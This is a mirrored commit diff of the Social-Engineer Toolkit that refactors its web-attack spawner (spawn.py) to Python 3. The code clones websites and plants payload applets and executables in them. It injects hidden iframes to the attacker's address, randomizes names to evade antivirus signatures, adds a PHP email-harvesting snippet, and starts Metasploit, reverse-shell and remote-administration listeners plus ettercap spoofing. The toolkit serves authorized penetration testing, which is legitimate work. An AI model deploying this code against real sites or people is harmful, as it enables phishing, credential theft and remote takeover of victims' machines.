Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 14:56:08 +00:00
Code Issues Projects Releases Packages Wiki Activity

autopep8 and python3 refactoring - wh00t

Browse source
This commit is contained in:
TrustedSec 2016-01-14 17:06:10 -05:00
parent 633a59779b
commit cefd5ffa2d
43 changed files with 4471 additions and 3863 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
src/html/fasttrack_http_server.py
View file

@ -1,7 +1,7 @@
#!/usr/bin/env python
import os
import sys
definepath=os.getcwd()
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
start_web_server_unthreaded(setdir + "/web_clone/")

508
src/html/spawn.py
View file

@ -5,8 +5,8 @@ import re
import socket
import subprocess
from src.core.setcore import *
import thread
import SocketServer
import _thread
import socketserver
import shutil
import re
import threading
@ -19,32 +19,37 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = check_options("APPLET_NAME=")
if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if check_options("CUSTOM_EXE="):
custom = 1
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
if check_options("CUSTOM_EXE="):
custom = 1
print_status(
"Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status(
"SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status(
"If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = file("%s/web_clone/index.html" % (setdir), "r")
filewrite = file("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
# we randomize param name so static sigs cant be used
goat_random = generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="%s"' % (goat_random))
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), shell=True).wait()
# we randomize param name so static sigs cant be used
goat_random = generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"',
'param name="8" value="%s"' % (goat_random))
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" %
(setdir, setdir), shell=True).wait()
# set current path
definepath=os.getcwd()
definepath = os.getcwd()
# check os
operating_system = check_os()
@ -56,7 +61,8 @@ if operating_system == "posix":
try:
import pexpect
except ImportError:
print_error("python-pexpect is not installed.. some things may not work.")
print_error(
"python-pexpect is not installed.. some things may not work.")
return_continue()
# specify base msf_path
@ -65,73 +71,79 @@ msf_path = ""
# see if we are using setshell
set_payload = ""
if os.path.isfile(setdir + "/set.payload"):
fileopen = file(setdir + "/set.payload", "r")
for line in fileopen: set_payload = line.rstrip()
fileopen = open(setdir + "/set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
##################################################################################
##########################################################################
#
# Start of the SET Web Server for multiattack, java applet, etc.
#
##################################################################################
##########################################################################
def web_server_start():
# define if use apache or not
apache=0
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
apache = 1
if operating_system == "windows": apache = 0
if operating_system == "windows":
apache = 0
# specify the web port
web_port = check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(setdir + "/meta_config"):
fileopen=file(setdir + "/meta_config", "r")
fileopen = open(setdir + "/meta_config", "r")
for line in fileopen:
line=line.rstrip()
match=re.search("set SRVPORT 80", line)
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2=re.search("set SRVPORT 8080", line)
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port=8080
web_port = 8080
# check ip address
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your ipaddress: ")
ipaddr = input("Enter your ipaddress: ")
# Grab custom or set defined
if os.path.isfile(setdir + "/site.template"):
fileopen=file(setdir + "/site.template","r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("TEMPLATE=", line)
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line=line.split("=")
template=line[1]
line = line.split("=")
template = line[1]
# grab web attack selection
if os.path.isfile(setdir + "/attack_vector"):
fileopen=file(setdir + "/attack_vector","r").readlines()
fileopen = open(setdir + "/attack_vector", "r").readlines()
for line in fileopen:
attack_vector=line.rstrip()
attack_vector = line.rstrip()
# if it doesn't exist just set a default template
if not os.path.isfile(setdir + "/attack_vector"):
attack_vector = "nada"
# Sticking it to A/V below
import string,random
def random_string(minlength=6,maxlength=15):
length=random.randint(minlength,maxlength)
letters=string.ascii_letters+string.digits
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen=random_string()
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
@ -142,22 +154,23 @@ def web_server_start():
# open our config file that was specified in SET
if os.path.isfile(setdir + "/site.template"):
fileopen=file(setdir + "/site.template", "r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
# start loop here
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
# look for config file and parse for URL
match=re.search("URL=",line)
match = re.search("URL=", line)
if match:
line=line.split("=")
line = line.split("=")
# define url to clone here
url=line[1].rstrip()
url = line[1].rstrip()
# if we didn't create template then do self
if not os.path.isfile(setdir + "/site.template"):
template = "SELF"
# If SET is setting up the website for you, get the website ready for delivery
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
@ -166,15 +179,16 @@ def web_server_start():
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
fileopen=file("index.template", "r").readlines()
filewrite=file("index.html", "w")
fileopen = open("index.template", "r").readlines()
filewrite = open("index.html", "w")
if attack_vector == "java":
for line in fileopen:
match1=re.search("msf.exe", line)
if match1: line=line.replace("msf.exe", rand_gen)
match=re.search("ipaddrhere", line)
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line=line.replace("ipaddrhere", ipaddr)
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
filewrite.close()
@ -182,24 +196,26 @@ def web_server_start():
# define browser attack vector here
if attack_vector == "browser":
counter=0
counter = 0
for line in fileopen:
counter=0
match=re.search(applet_name, line)
counter = 0
match = re.search(applet_name, line)
if match:
line=line.replace(applet_name, "invalid.jar")
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter=1
match2=re.search("<head>", line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line=line.replace("<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
line = line.replace(
"<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
filewrite.write(line)
counter=1
counter = 1
if web_port == 8080:
line=line.replace("<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
line = line.replace(
"<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
filewrite.write(line)
counter=1
counter = 1
if counter == 0:
filewrite.write(line)
filewrite.close()
@ -208,33 +224,41 @@ def web_server_start():
# Bring our files to our directory
if attack_vector != 'hid':
if attack_vector != 'hijacking':
print bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(setdir + "/" + applet_name):
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % (definepath), "%s/%s" % (setdir,applet_name))
shutil.copyfile(setdir + "/%s" % (applet_name), "%s/web_clone/%s" % (setdir,applet_name))
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath), "%s/%s" % (setdir, applet_name))
shutil.copyfile(setdir + "/%s" % (applet_name),
"%s/web_clone/%s" % (setdir, applet_name))
if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
nix = check_options("NIX.BIN=")
shutil.copyfile("%s/src/html/nix.bin" % (definepath), "%s/web_clone/%s" % (setdir, nix))
shutil.copyfile("%s/src/html/nix.bin" %
(definepath), "%s/web_clone/%s" % (setdir, nix))
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/web_clone/%s" % (setdir, definepath, mac))
shutil.copyfile("%s/src/html/mac.bin" % (definepath),
"%s/web_clone/%s" % (setdir, definepath, mac))
if os.path.isfile(setdir + "/msf.exe"):
win = check_options("MSF.EXE=")
shutil.copyfile(setdir + "/msf.exe" , "%s/web_clone/%s" % (setdir,win))
shutil.copyfile(setdir + "/msf.exe",
"%s/web_clone/%s" % (setdir, win))
# pull random name generation
print_status("The site has been moved. SET Web Server is now listening..")
print_status(
"The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=")
if rand_gen != 0:
if os.path.isfile(setdir + "/custom.exe"):
shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe")
print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
shutil.copyfile(setdir + "/web_clone/msf.exe", setdir + "/web_clone/%s" % (rand_gen))
shutil.copyfile(setdir + "/msf.exe",
setdir + "/web_clone/msf.exe")
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(setdir + "/web_clone/msf.exe",
setdir + "/web_clone/%s" % (rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(setdir + "/docbase.file"):
docbase=(r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
@ -245,197 +269,228 @@ def web_server_start():
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
</FRAMESET>
</HTML>""" % (ipaddr))
if os.path.isfile(setdir + "/web_clone/site.html"): os.remove(setdir + "/web_clone/site.html")
shutil.copyfile(setdir + "/web_clone/index.html", setdir + "/web_clone/site.html")
filewrite=file(setdir + "/web_clone/index.html", "w")
if os.path.isfile(setdir + "/web_clone/site.html"):
os.remove(setdir + "/web_clone/site.html")
shutil.copyfile(setdir + "/web_clone/index.html",
setdir + "/web_clone/site.html")
filewrite = open(setdir + "/web_clone/index.html", "w")
filewrite.write(docbase)
filewrite.close()
####################################################################################################################################
##########################################################################
#
# START WEB SERVER STUFF HERE
#
####################################################################################################################################
##########################################################################
if apache == 0:
if multiattack_harv == 'off':
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet attack
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet
# attack
path = (setdir + "/web_clone/")
try:
import multiprocessing
p = multiprocessing.Process(target=webserver.start_server, args=(web_port,path))
p = multiprocessing.Process(
target=webserver.start_server, args=(web_port, path))
p.start()
except Exception:
import thread
thread.start_new_thread(webserver.start_server, (web_port,path))
import _thread
_thread.start_new_thread(
webserver.start_server, (web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
exit_set()
# Handle Exceptions
except Exception,e:
print e
except Exception as e:
print(e)
log(e)
print bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??"
print "[!] There was an issue, printing error: " +str(e) + bcolors.ENDC
print bcolors.ENDC + "Do you want to try to stop Apache? y/n"
stop_apache = raw_input("Attempt to stop Apache? y/n: ")
print(bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??")
print("[!] There was an issue, printing error: " + str(e) + bcolors.ENDC)
print(bcolors.ENDC + "Do you want to try to stop Apache? y/n")
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet attack
# specify the path for the SET web directories for the
# applet attack
path = (setdir + "/web_clone/")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port,path))
p = multiprocessing.Process(
target=webserver.start_server, args=(web_port, path))
p.start()
except Exception:
print bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC
print(bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC)
sys.exit()
# if we are custom, put a pause here to not terminate thread on web server
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = check_options("CUSTOM_EXE=")
if custom_exe != 0:
while 1:
# try block inside of loop, if control-c detected, then exit
# try block inside of loop, if control-c detected, then
# exit
try:
print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
pause = raw_input(bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)
print_warning(
"Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
pause = input(
bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)
# handle keyboard interrupt
except KeyboardInterrupt:
print bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC
print(bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC)
break
if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,setdir,apache_path,setdir,apache_path,setdir,apache_path), shell=True).wait()
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
(definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait()
# if we are tracking users
if track_email == "on":
now=datetime.datetime.today()
filewrite = file("%s/harvester_%s.txt" % (apache_path,now), "w")
now = datetime.datetime.today()
filewrite = open("%s/harvester_%s.txt" % (apache_path, now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_path,now), shell=True).wait()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" %
(apache_path, now), shell=True).wait()
# here we specify if we are tracking users and such
fileopen = file ("%s/index.html" % (apache_path), "r")
fileopen = open("%s/index.html" % (apache_path), "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file("%s/index.php" % (apache_path), "w")
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = open("%s/index.php" % (apache_path), "w")
filewrite.write(data)
filewrite.close()
print_status("All files have been copied to %s" % (apache_path))
#####################################################################################################################################
##########################################################################
#
# END WEB SERVER STUFF HERE
#
#####################################################################################################################################
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path=meta_path()
msf_path = meta_path()
import pexpect
# define if use apache or not
apache=0
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
apache = 1
if operating_system == "windows": apache = 0
if operating_system == "windows":
apache = 0
web_server = check_config("WEB_PORT=")
# setup multi attack options here
multiattack="off"
multiattack = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"):
multiattack="on"
multiattack = "on"
if os.path.isfile(setdir + "/multi_harvester"):
multiattack="on"
multiattack = "on"
# Grab custom or set defined
template = ""
if os.path.isfile(setdir + "/site.template"):
fileopen=file(setdir + "/site.template","r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("TEMPLATE=", line)
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line=line.split("=")
template=line[1]
line = line.split("=")
template = line[1]
# Test to see if something is running on port 80, if so throw error
try:
web_port = check_config("WEB_PORT=")
web_port=int(web_port)
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
# if apache isnt running and something is on 80, throw error
if apache== 0:
print_error("ERROR:Something is running on port %s. Attempting to see if we can stop Apache..." % (web_port))
# if we are running windows then flag error (probably IIS or tomcat or something like that)
# if apache isnt running and something is on 80, throw error
if apache == 0:
print_error(
"ERROR:Something is running on port %s. Attempting to see if we can stop Apache..." % (web_port))
# if we are running windows then flag error (probably IIS or tomcat
# or something like that)
if operating_system == "nt":
exit_set()
# if we are running posix then check to see what the process is first
# if we are running posix then check to see what the process is
# first
if operating_system == "posix":
# if we detect an apache installation
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = raw_input("[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
print_status("Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
exit_set()
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = input(
"[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
print_status(
"Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error(
"Exit whatever is listening and restart SET")
exit_set()
# if it couldn't connect to localhost, we are good to go and continue forward
except Exception:
print_status("Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
print_error("Exit whatever is lsitening or turn Apache on in set_config and restart SET")
exit_set()
else:
print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
# if it couldn't connect to localhost, we are good to
# go and continue forward
except Exception:
print_status(
"Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag
# user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
print_error(
"Exit whatever is lsitening or turn Apache on in set_config and restart SET")
exit_set()
else:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
exit_set()
# if apache is set to run let the user know we are good to go
if operating_system == "posix":
if apache == 1:
try:
web_port = check_config("WEB_PORT=")
web_port=int(web_port)
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
print_status("Apache appears to be running, moving files into Apache's home")
print_status(
"Apache appears to be running, moving files into Apache's home")
except:
print_error("Exit whatever is listening and restart SET")
exit_set()
# except all issues and throw out to here
except Exception, e:
except Exception as e:
# if we are using apache
if apache == 1:
@ -454,7 +509,8 @@ except Exception, e:
if apache_counter == 0:
print_error("ERROR: Unable to start Apache through SET,")
print_error("ERROR: Please turn Apache off in the set_config or turn it on manually!")
print_error(
"ERROR: Please turn Apache off in the set_config or turn it on manually!")
print_error("Exiting the Social-Engineer Toolkit...")
exit_set()
@ -464,42 +520,47 @@ except KeyboardInterrupt:
# grab metasploit root directory
if operating_system == "posix":
msf_path=meta_path()
msf_path = meta_path()
# Launch SET web attack and MSF Listener
try:
if multiattack == "off":
print (bcolors.BLUE + "\n***************************************************")
print (bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack.")
print (bcolors.BLUE + "***************************************************")
print (bcolors.PURPLE+ "\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC)
print((bcolors.BLUE + "\n***************************************************"))
print((bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack."))
print((bcolors.BLUE + "***************************************************"))
print((bcolors.PURPLE +
"\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC))
if apache == 1:
print (bcolors.GREEN+ "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)
print((
bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
if os.path.isfile(setdir + "/meta_config"):
fileopen=file(setdir + "/meta_config", "r")
fileopen = open(setdir + "/meta_config", "r")
for line in fileopen:
line=line.rstrip()
match=re.search("set SRVPORT 80", line)
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2=re.search("set SRVPORT 8080", line)
match2 = re.search("set SRVPORT 8080", line)
if not match2:
if apache == 1:
print_warning("Apache appears to be configured in the SET (set_config)")
print_warning("You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav")
print_warning(
"Apache appears to be configured in the SET (set_config)")
print_warning(
"You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav")
exit_set()
print bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic."""
print(bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""")
web_server_start()
# if we are using ettercap
if os.path.isfile(setdir + "/ettercap"):
fileopen5=file(setdir + "/ettercap", "r")
fileopen5 = open(setdir + "/ettercap", "r")
for line in fileopen5:
ettercap=line.rstrip()
ettercap = line.rstrip()
# run in background
ettercap=ettercap+" &"
ettercap = ettercap + " &"
# spawn ettercap or dsniff
subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
subprocess.Popen(ettercap, shell=True,
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory
if os.path.isfile(setdir + "/meta_config"):
@ -508,75 +569,93 @@ try:
# this checks to see if we want to start a listener
automatic_listener = check_config("AUTOMATIC_LISTENER=").lower()
if automatic_listener != "off":
try: reload(pexpect)
except: import pexpect
try:
reload(pexpect)
except:
import pexpect
# specify if we are using the multi pyinjector
meta_config = "meta_config"
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload
if custom != 1:
child1=pexpect.spawn("%smsfconsole -r %s/%s\r\n\r\n" % (msf_path,setdir,meta_config))
# check if we want to deliver emails or track users that click the link
# if we arent using a custom payload
if custom != 1:
child1 = pexpect.spawn(
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config))
# check if we want to deliver emails or track users that click the
# link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try: reload(src.phishing.smtp.client.smtp_web)
except: import src.phishing.smtp.client.smtp_web
try:
reload(src.phishing.smtp.client.smtp_web)
except:
import src.phishing.smtp.client.smtp_web
# if we arent using a custom payload
# if we arent using a custom payload
if custom != 1:
child1.interact()
child1.interact()
if os.path.isfile(setdir + "/set.payload"):
port = check_options("PORT=")
# grab configuration
fileopen=file(setdir + "/set.payload", "r")
for line in fileopen: set_payload = line.rstrip()
fileopen = open(setdir + "/set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
if set_payload == "SETSHELL":
print "\n"
print("\n")
print_info("Launching the SET Interactive Shell...")
try: reload(src.payloads.set_payloads.listener)
except: import src.payloads.set_payloads.listener
try:
reload(src.payloads.set_payloads.listener)
except:
import src.payloads.set_payloads.listener
if set_payload == "SETSHELL_HTTP":
print "\n"
print("\n")
print_info("Launching the SET HTTP Reverse Shell Listener...")
try: reload(src.payloads.set_payloads.set_http_server)
except: import src.payloads.set_payloads.set_http_server
try:
reload(src.payloads.set_payloads.set_http_server)
except:
import src.payloads.set_payloads.set_http_server
if set_payload == "RATTE":
print_info("Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...")
print_info(
"Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...")
# prep ratte if its posix
if operating_system == "posix":
subprocess.Popen("chmod +x src/payloads/ratte/ratteserver", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen("chmod +x src/payloads/ratte/ratteserver",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
os.system("src/payloads/ratte/ratteserver %s" % (port))
# if not then run it in windows
if operating_system == "windows":
if not os.path.isfile(setdir + "/ratteserver.exe"):
shutil.copyfile("../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe")
shutil.copyfile("../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll")
os.system(setdir + "/ratteserver %s" % (definepath,port))
shutil.copyfile(
"../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe")
shutil.copyfile(
"../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll")
os.system(setdir + "/ratteserver %s" % (definepath, port))
# handle errors
except Exception, e:
except Exception as e:
log(e)
pass
try:
if apache == 1:
raw_input(bcolors.ENDC +"\nPress [return] when finished.")
input(bcolors.ENDC + "\nPress [return] when finished.")
child.close()
child1.close()
# close ettercap thread, need to launch from here eventually instead of executing
# an underlying system command.
if operating_system == "posix":
subprocess.Popen("pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen(
"pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait()
# kill dnsspoof if there
subprocess.Popen("pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen(
"pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait()
if apache == 1:
subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" % (apache_path,apache_path,apache_path), shell=True).wait()
subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" %
(apache_path, apache_path, apache_path), shell=True).wait()
except:
try:
child.close()
@ -588,7 +667,7 @@ except KeyboardInterrupt:
# if we turned automatic listener off
if automatic_listener == "off" or multiattack== "on":
if automatic_listener == "off" or multiattack == "on":
if automatic_listener == "off":
print_warning("Listener is turned off in /etc/setoolkit/set.config!")
@ -596,14 +675,17 @@ if automatic_listener == "off" or multiattack== "on":
while 1:
try:
print_warning("\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.")
pause = raw_input("\nPress {control -c} to return to the main menu when you are finished.")
print_warning(
"\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.")
pause = input(
"\nPress {control -c} to return to the main menu when you are finished.")
except KeyboardInterrupt:
break
if apache == 1:
# if we are running apache then prompt to exit this menu
print_status("Everything has been moved over to Apache and is ready to go.")
print_status(
"Everything has been moved over to Apache and is ready to go.")
return_continue()
# we stop the python web server when we are all finished
@ -611,8 +693,10 @@ if apache == 0:
# specify the web port
web_port = check_config("WEB_PORT=")
# stop the web server
try: import src.core.webserver as webserver
except: reload(src.core.webserver)
try:
import src.core.webserver as webserver
except:
reload(src.core.webserver)
webserver.stop_server(web_port)
# call the cleanup routine

13
src/html/unsigned/self_sign.py
View file

@ -10,11 +10,12 @@ from src.core.setcore import *
#########################
# create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
# sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
# sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass
